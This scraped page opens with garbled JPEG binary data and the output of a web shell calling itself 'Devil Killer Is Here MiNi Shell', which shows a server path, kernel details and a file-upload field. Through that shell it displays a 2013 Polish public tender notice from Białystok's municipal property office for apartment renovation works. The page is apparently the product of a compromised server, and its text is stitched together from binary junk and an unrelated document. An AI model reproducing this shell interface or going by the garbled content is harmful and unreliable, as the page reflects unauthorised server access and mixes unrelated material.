JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131210/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131210/511216-N-2013.html

<p class="kh_header"><b>Białystok: Wykonanie robót remontowych w zasobach Zarządu Mienia Komunalnego 
w Białymstoku część XVII - nr sprawy: TT/DZ/3412/94/13.</b><br>
<b>Numer ogłoszenia: 511216 - 2013; data zamieszczenia: 10.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Mienia Komunalnego , ul. gen. J. Bema 89/1, 15-370 Białystok, woj. podlaskie, tel. 085 7479457, faks 085 7479483.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zmk.bialystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót remontowych w zasobach Zarządu Mienia Komunalnego 
w Białymstoku część XVII - nr sprawy: TT/DZ/3412/94/13..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest: Wykonanie robót remontowych  w  zasobach  Zarządu Mienia Komunalnego w Białymstoku, (cz. XVII), tj.:
1) zadanie nr 1 - remont lokalu mieszkalnego przed zasiedleniem przy ul. Klepackiej 2D m 4 i ul. Klepackiej 2A m 21 w Białymstoku;
2) zadanie nr 2 - wymiana drzwi wejściowych zewnętrznych do budynku przy ul. Pietkiewicza 12 i 14 w Białymstoku;
3) zadanie 3 - remont instalacji elektrycznej w lokalu mieszkalnym przy: ul. Wierzbowej 21 m 19, Tuwima 1/3 m 67, Tuwima 1/1 m 61, Tuwima 1/1 m 3, Tuwima 1/3 m 56, Broniewskiego 8b m 59, Broniewskiego 19 m 14, Sobieskiego 2 m 3, Puławskiego 99 m 8, Puławskiego 87 m 31 w  Białymstoku;
4) zadanie nr 4 - remont lokalu mieszkalnego przed zasiedleniem przy ul. Barszczanskiej 3 m 42 w  Białymstoku;
5) zadanie nr 5 - remont lokalu mieszkalnego w zakresie robót budowlanych i sanitarnych przy ul. Fabrycznej 51 m 8 w Białymstoku;
6) zadanie nr 6 - remont lokalu mieszkalnego przed zasiedleniem przy ul. Klepackiej 2 m 6 w Białymstoku;
7) zadanie nr 7 - wymiana stolarki okiennej w lokalu mieszkalnym przy ul. Bema 101 m 57 i 79 w  Białymstoku;
- zgodnie z dokumentacją (szkice, rysunki, opis robót, przedmiary) i specyfikacjami technicznymi wykonania i odbioru robót. Szczegółowy opis przedmiotu zamówienia został podany w załączniku nr 1 do SIWZ Opis przedmiotu zamówienia.
2.	Podane w dokumentacji projektowej nazwy lub typy  materiałów i produktów mają na celu wskazanie parametrów jakościowych. W przypadku materiałów i produktów określonych w dokumentacji projektowej nazwą producenta, Zamawiający dopuszcza zastosowanie materiałów równoważnych, o parametrach nie niższych niż materiałów wskazanych nazwą. 
3.	Przedmiot zamówienia został podzielony na 7 zadań (części zamówienia). Zamawiający dopuszcza złożenie oferty częściowej na jedno, kilka wybranych lub całość przedmiotu zamówienia obejmujący zadania od nr 1 do nr 7.
4.	Wymaga  się  udzielenia:
1)	co najmniej 12 - miesięcznej gwarancji na wykonane roboty wraz z materiałami oraz na stolarkę  drzwiową i wykładzinę min. 24 miesiące - zadanie nr 1 i 4;
2)	co najmniej 12 - miesięcznej gwarancji na wykonane roboty wraz 
z materiałami - zadanie nr 3, 5 i 6;
3)	co najmniej 36 - miesięcznej gwarancji na wykonane roboty wraz 
z materiałami - zadanie nr 2;
4)	co najmniej 60 - miesięcznej gwarancji na wykonane roboty wraz 
z materiałami - zadanie nr 7. 
5.	W celu prawidłowego sporządzenia oferty wskazane jest, aby wykonawca dokonał wizji lokalnej oraz uzyskał wszystkie niezbędne informacje, co do ryzyka, trudności i wszelkich innych okoliczności, jakie mogą wystąpić w trakcie realizacji zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.43.21.00-5, 45.44.21.00-8, 45.33.20.00-3, 45.33.30.00-0, 45.31.10.00-0, 45.21.00.00-2, 45.45.00.00-6, 45.44.21.00-8, 45.30.00.00-0, 45.42.10.00-4, 45.42.11.00-5, 45.42.11.30-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie będzie wymagał w niniejszym postępowaniu wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dotyczy zadania nr 1, 2, 3, 4, 5, 6 i 7
Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia (zał. nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dotyczy zadania nr 1, 2, 3, 4, 5, 6 i 7
Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia (zał. nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dotyczy zadania nr 1, 2, 3, 4, 5, 6 i 7
Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia (zał. nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dotyczy zadania nr 3
Wykonawca winien wykazać, że dysponuje lub będzie dysponował osobami zdolnymi do wykonania zamówienia tj.:
a)	osobą, która będzie pełnić funkcję kierownika budowy, posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,
UWAGA! 
Zamawiający, określając wymogi w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konferencji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo budowlane oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (DzU z 2008 r. nr 63, poz. 394).
Dotyczy zadania nr 1, 2, 4, 5, 6 i 7
Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia (zał. nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dotyczy zadania nr 1, 2, 3, 4, 5, 6 i 7
Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia (zał. nr 3 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca, który wykazuje spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów:
1)	wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, 
w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia (art. 26 ust. 2b ustawy Pzp). 
Uwaga! Pisemne zobowiązanie podmiotu trzeciego należy złożyć w formie oryginału lub notarialnie poświadczonej kopii. Treść pisemnego zobowiązania podmiotu trzeciego powinna określać: kto jest podmiotem przyjmującym zasoby, zakres zobowiązania podmiotu trzeciego, czego konkretnie dotyczy zobowiązanie oraz w jaki sposób będzie ono wykonywane, w tym jakiego okresu dotyczy.
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego:
1)	każdy wykonawca zobowiązany jest złożyć oddzielnie dokument określony w rozdziale VI SIWZ pkt 3 ppkt 2, tj.: aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej,
2)	dokumenty określone w rozdziale VI SIWZ pkt 2 ppkt 1 i 2 winien złożyć co najmniej jeden 
z wykonawców wspólnie ubiegających się o udzielenie zamówienia,
3)	oświadczenie o spełnieniu warunków udziału w postępowaniu określone w rozdziale VI SIWZ pkt 1, oświadczenie o niepodleganiu wykluczeniu określone w rozdziale VI SIWZ pkt 3 ppkt 1 oraz oświadczenie z art. 26 ust. 2d ustawy Pzp określonego w rozdziale VI SIWZ pkt 7 ppkt 4 składa pełnomocnik wykonawców wspólnie ubiegających się o udzielenie zamówienia w ich imieniu 
(w miejscu nazwa i adres  wykonawcy należy wpisać dane dotyczące poszczególnych członków konsorcjum lub spółki cywilnej) bądź każdy z wykonawców oddzielnie.
Zamawiający wymaga także załączenia do oferty innych dokumentów:
1)	wypełniony formularz ofertowy - wg załączonego wzoru załącznik nr 2 do SIWZ,
2)	pełnomocnictwo w oryginale albo notarialnie potwierdzonej kopii - w przypadku, gdy oferta została podpisana przez pełnomocnika lub gdy oferta została złożona przez wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ustawy Pzp,
3)	na podstawie art. 26 ust. 2b ustawy Pzp wykonawca składa pisemne zobowiązanie podmiotu trzeciego - w przypadku gdy podmiot trzeci udostępni osoby zdolne do wykonania zamówienia - dotyczy zadania nr 3,
4)	na podstawie art. 26 ust. 2d ustawy Pzp wykonawca składa listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy Pzp albo informację o tym, że nie należy do tej grupy kapitałowej. Informację, iż wykonawca nie należy do tej samej grupy kapitałowej należy złożyć zgodnie z załącznikiem nr 4 do SIWZ (przepis art. 26 ust. 3 i 4 ustawy Pzp stosuje).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>ZMIANA UMOWY 
§ 12
1.	Wszelkie zmiany niniejszej umowy wymagają dla swej ważności formy pisemnej pod rygorem nieważności i będą dopuszczalne w granicach unormowania artykułu 144 ustawy Prawo zamówień publicznych.
2.	Zamawiający dopuszcza możliwość zmiany ustaleń zawartej umowy, w stosunku do treści oferty Wykonawcy, w następującym zakresie i okolicznościach:
1)	strony dopuszczają możliwość przedłużenia terminu, o których mowa w § 3 ust. 1 o czas opóźnienia, jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy  następujących przypadkach:
a)	wystąpienia zamówień dodatkowych, których wykonanie wiąże się z koniecznością wydłużenia czasu realizacji zamówienia - warunki określono szczegółowo w § 5,  
b)	działaniem siły wyższej, tzn. zdarzenia nagłego, nieprzewidzianego i niezależnego od woli stron, uniemożliwiającego wykonanie umowy w całości lub części (np. powódź, huragan, pożar),
c)	wystąpienie szczególnie niesprzyjających warunków atmosferycznych uniemożliwiających prowadzenie robót budowlanych zgodnie ze sztuką budowlaną i wiedzą techniczną,
d)	przerwania lub zawieszenia robót przez Zamawiającego z przyczyn niezawinionych przez Wykonawcę,
e)	opóźnień spowodowanych niewykonaniem przez Zamawiającego zobowiązań dotyczących terminu przekazania placu budowy, dokumentów koniecznych do realizacji zamówienia, dokumentacji zamiennej,
2)	zmiany wysokości wynagrodzenia, którym mowa w § 4 ust. 1: 
a)	poprzez zmniejszenie zakresu zamówienia oraz robót zamiennych - warunki określono szczegółowo w § 6,  
b)	w przypadku zmiany stawki VAT,
3)	zmiany obowiązujących przepisów prawa,
4)	zamawiający może dokonać zmiany swoich przedstawicieli wykazanych w § 11 ust. 2,
5)	wykonawca może dokonać zmiany swojego przedstawiciela wykazanych w § 11 ust. 1,
6)		zmiany Podwykonawcy robót, pod warunkiem wyrażenia zgody Zamawiającego na taką zmianę oraz spełnieniem przez nowego Podwykonawcę takich samych warunków jak Podwykonawca pierwotny.
3.	Warunkiem dokonania zmiany, o której mowa w ust. 2, jest zgoda na jej dokonanie wyrażona przez obie strony oraz złożenie uzasadnionego wniosku przez stronę inicjującą zmianę lub sporządzenie przez strony stosownego protokołu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zmk.bialystok.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Mienia Komunalnego, ul. gen. J. Bema 89/1, 15-370 Białystok, sekretariat, pokój 111..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.12.2013 godzina 10:00, miejsce: Zarząd Mienia Komunalnego, ul. gen. J. Bema 89/1, 15-370 Białystok, sekretariat, pokój 201..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> zadanie nr 1 - remont lokalu mieszkalnego przed zasiedleniem przy ul. Klepackiej 2D m 4 
i ul. Klepackiej 2A m 21 w Białymstoku;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 1
REMONT LOKALU MIESZKALNEGO PRZED ZASIEDLENIEM  PRZY UL. KLEPACKIEJ 2D m 4  i UL. KLEPACKIEJ 2A m 21 W BIAŁYMSTOKU.
Zadanie 1.1 (branża budowlana, sanitarna i elektryczna ) - ul. Klepacka 2D m 4 
Branża budowlana
1. Opis robót -zał. 1.1.1 a i b
2. Przedmiar  robót - zał.1. 1.2 a
3. Specyfikacja Techniczna Wykonania i Odbioru Robót (Br. Budowlana) - zał. 1.1.3 a
Branża sanitarna
1. Opis robót -zał. 1.1.1 a i b
2. Przedmiar  robót - zał.1. 1.2 b
3. Specyfikacja Techniczna Wykonania i Odbioru Robót (Br. Sanitarna) - zał.1. 1.3 b
Branża elektryczna 
1. Opis robót + szkice 2 rys. -zał. 1.1.1 c
2. Przedmiar  robót - zał.1. 1.2 c
3. Specyfikacja Techniczna Wykonania i Odbioru Robót (Br. Elektryczna ) - zał.1. 1.3 c
Zadanie 1.2  (branża, sanitarna) - ul. Klepacka 2A m 21 
Branża sanitarna
1. Opis robót -zał. 1.2.1 
       2. Przedmiar  robót - zał.1.2.2 
       3. Specyfikacja Techniczna Wykonania i Odbioru Robót 	(Br. Sanitarna) - zał.1.2.3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.43.21.00-5, 45.44.21.00-8, 45.33.20.00-3, 45.33.30.00-0, 45.31.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> zadanie nr 2 - wymiana drzwi wejściowych zewnętrznych do budynku przy ul. Pietkiewicza 12 i 14 
w Białymstoku;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 2 
WYMIANA DRZWI WEJŚCIOWYCH ZEWNĘTRZNYCH DO BUDYNKU   PRZY        UL. PIETKIEWICZA 12 i 14 W BIAŁYMSTOKU.
  Branża budowlana
1. Opis robót -zał. 2.1
       2. Przedmiar  robót - zał. 2.2 a i 2.2 b 
       3. Specyfikacja Techniczna Wykonania i Odbioru Robót 	(Br. Budowlana) - zał. 2.3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> zadanie 3 - remont instalacji elektrycznej w lokalu mieszkalnym przy: ul. Wierzbowej 21 m 19, Tuwima 1/3 m 67, Tuwima 1/1 m 61, Tuwima 1/1 m 3, Tuwima 1/3 m 56, Broniewskiego 8b m 59, Broniewskiego 19 m 14, Sobieskiego 2 m 3, Puławskiego 99 m 8, Puławskiego 87 m 31 w  Białymstoku;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 3 
REMONT INSTALACJI ELEKTRYCZNEJ W LOKALU MIESZKALNYM PRZY: UL.WIERZBOWEJ 21 m 19 , TUWIMA 1/3 m 67, TUWIMA  1/1 m 61, TUWIMA  1/1 m 3  TUWIMA 1/3 m 56 BRONIEWSKIEGO 8B m 59, BRONIEWSKIEGO 19 m 14 , SOBIESKIEGO 2 m 3 UL. PUŁASKIEGO  99 m 8 i Ul. PUŁAWSKIEGO 87 m 31                W  BIAŁYMSTOKU.
      Zadanie 3.1 -Branża elektryczna  (ul. Wierzbowa  21 m 19 )
1. Opis robót + szkice 2 rys. -zał.3.1.1
       2. Przedmiar  robót - zał. 3.1.2
       3. Specyfikacja Techniczna Wykonania i Odbioru Robót 	(Br. Elektryczna) - zał 3.1.3

      Zad. 3.2 - Branża elektryczna (ul. Tuwima  1/3 m 67 )
1. Opis robót + szkice 2 rys. -zał.3.2.1
       2. Przedmiar  robót - zał. zał. 3.2.2
       3. Specyfikacja Techniczna Wykonania i Odbioru Robót 	(Br. Elektryczna) - zał. 3.2.3
     Zad. 3.3. -Branża elektryczna  (ul. Tuwima 1/1 m 61 )
1. Opis robót + szkice 2 rys. -zał. 3.3.1
       2. Przedmiar  robót - zał. 3.3.2
       3. Specyfikacja Techniczna Wykonania i Odbioru Robót 	(Br. Elektryczna) - zał.3.3.3

      Zad. 3.4 -Branża elektryczna   ( ul. Tuwima  1/1 m 3 )
1. Opis robót + szkice 2 rys. -zał. 3.4.1
       2. Przedmiar  robót - zał. 3.4.2
       3. Specyfikacja Techniczna Wykonania i Odbioru Robót 	(Br. Elektryczna) - zał. 3.4.3

